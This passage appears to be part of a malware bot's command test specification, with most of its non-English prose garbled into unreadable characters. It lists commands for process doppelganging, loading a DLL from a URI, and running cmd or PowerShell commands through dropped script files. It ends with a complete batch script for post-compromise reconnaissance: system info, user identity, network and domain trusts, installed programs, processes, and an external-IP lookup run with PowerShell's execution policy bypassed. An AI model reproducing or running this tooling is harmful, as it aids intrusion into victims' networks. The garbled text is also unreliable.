  564. ������ ����� ��
  566. 4.2.5 "10 3 60 1 %URI% a b c %id%" - process doppelganging
  567. ������ ����� ��
  569. 4.2.6 "10 3 0 1 %URI% a b c %id%" - process doppelganging, timeout=0
  570. ������ ����� ��
  572. 4.3. ������� 11. ��� ������� ������ �������� �� ������ dll, � �������� ������� ������������ TestDll32.dll.
  573. ������� Start �� TestDll32.dll ������� stdout ����� "test dll - start()". �� ������ �������� ���� ����� � ��M.
  574. ����� ������ 11 %timeout% %URI% %cmdline%
  576. 4.3.1. "11 60 %URI% Start"
  577. ��� ������ ���������� �������� %URI% � ����� � TestDll32.dll.
  578. ������ ����� ��, ��� � ������� 10.
  580. 4.3.2. "11 0 %URI% Start" - timeout=0
  581. ������ ����� ��
  585. 4.4. ������� 12. ������ cmd �������.
  587. 4.4.1. "12 60 cmd /c cd c:\&&dir" - ������ ������� ��� �������� bat-�����
  588. ������ ����� ��, ��� � ������� 10.
  590. 4.4.2. "12 60 cmd /c\r\ncd c:\\r\ndir" - ������ ������� ����� �������� bat-�����
  591. ������ ����� ��, ��� � ������� 10.
  595. 4.5. ������� 13. ������ powershell �������.
  597. 4.5.1. "13 60 a b c\r\ncd c:\\r\ndir" - ������ ������� ����� �������� ps1-�����
  598. a b c - ��������� ��� �������, ����� �������������.
  599. ������ ����� ��, ��� � ������� 10.
  602. 4.6. ������� 15. ��������� ���������.
  603. 4.6.1. "15 %pid%"
  604. �����:
  605. msg=MMM
  607. 4.7. ������� 100. �������� �� �������.
  608. 4.7.1. "100"
  609. �����:
  610. msg=OK
  613. ������ ��������� ���������� � �������
  615. @echo off
  617. echo General Info:
  618. systeminfo
  620. echo.
  621. echo My Username:
  622. whoami
  624. echo.
  625. echo Network Neighbourghoud:
  626. net view /all
  628. echo.
  629. echo Domain Neighbourghoud:
  630. net view /all /domain
  632. echo.
  633. echo Domain Trust:
  634. nltest /domain_trusts /all_trusts
  636. echo.
  637. echo Installed Programs:
  638. reg query hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /v "DisplayName" /s
  640. echo.
  641. echo Installed Programs (wow64):
  642. reg query hklm\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall /v "DisplayName" /s
  644. echo.
  645. echo Installed Programs (current user):
  646. reg query hkcu\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /v "DisplayName" /s
  648. echo.
  649. echo Installed Programs (current user, wow64):
  650. reg query hkcu\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall /v "DisplayName" /s
  652. echo.
  653. echo Process List:
  654. tasklist
  656. echo.
  657. echo External IP:
  658. powershell -executionpolicy bypass -command "$Servers= @('http://checkip.amazonaws.com','https://ipinfo.io/ip','http://api.ipify.org','https://myexternalip.com/raw','http://wtfismyip.com/text','http://ip.anysrc.net/plain/clientip','http://api.ipify.org/?format=text','http://api.ip.sb/ip','http://ident.me/ip'); $i=Get-Random -Minimum 0 -Maximum 8; Write-Host HTTP-DNS request via $Servers[$i]; $ip=Invoke-WebRequest -UseBasicParsing -Uri $Servers[$i]; write-host $ip.content;"